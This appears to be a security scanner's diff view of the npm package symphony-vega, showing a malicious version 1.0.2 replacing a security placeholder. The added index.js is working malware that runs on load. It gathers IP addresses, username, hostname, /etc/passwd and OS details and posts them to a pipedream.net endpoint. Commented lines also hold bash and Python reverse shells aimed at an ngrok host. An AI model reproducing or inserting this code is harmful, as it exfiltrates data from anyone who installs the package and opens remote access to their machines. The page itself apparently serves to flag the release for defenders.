symphony-vega 0.0.1-security → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of symphony-vega might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +47 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ const execSync = require('child_process').execSync;
2
+ const priv_ip = execSync('hostname -I', { encoding: 'utf-8' });
3
+ const whoami = execSync('whoami', { encoding: 'utf-8' });
4
+ const host = execSync('hostname', { encoding: 'utf-8' });
5
+ const l9 = execSync('dig +short myip.opendns.com @resolver1.opendns.com', { encoding: 'utf-8' });
6
+ const passwd = execSync('cat /etc/passwd', { encoding: 'utf-8' });
7
+ const php = execSync('php --version', { encoding: 'utf-8' });
8
+ const lsb = execSync('lsb_release -a', { encoding: 'utf-8' });
9
+ // const shell = execSync('bash -i >& /dev/tcp/0.tcp.in.ngrok.io/14528 0>&1', { encoding: 'utf-8' });
10
+ const wbash = execSync('which bash', { encoding: 'utf-8' });
11
+ // const pyv = execSync('python3 --version', { encoding: 'utf-8' });
12
+ // const current_dir = execSync('pwd', { encoding: 'utf-8' });
13
+ // const py3 = execSync("export RHOST='0.tcp.in.ngrok.io';export RPORT=16848;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv('RHOST'),int(os.getenv('RPORT'))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')'", { encoding: 'utf-8' });
14
+
15
+
16
+
17
+ const https = require("https")
18
+
19
+ const data = JSON.stringify({
20
+ "private IP": priv_ip,
21
+ "whoami-symphony-vega": whoami,
22
+ "hostname": host,
23
+ "passwd": passwd,
24
+ "php version": php,
25
+ "lsb": lsb,
26
+ "l9 public IP": l9,
27
+ // "shell": shell,
28
+ "Which bash": wbash,
29
+ // "python version": pyv,
30
+ // "current dir": current_dir,
31
+ // "py": py,
32
+ })
33
+
34
+ const options = {
35
+ hostname: "eoi9eva5ggrnjta.m.pipedream.net",
36
+ port: 443,
37
+ path: "/",
38
+ method: "POST",
39
+ headers: {
40
+ "Content-Type": "application/json",
41
+ "Content-Length": data.length,
42
+ },
43
+ }
44
+
45
+ const req = https.request(options)
46
+ req.write(data)
47
+ req.end()
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "symphony-vega",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=symphony-vega for more information.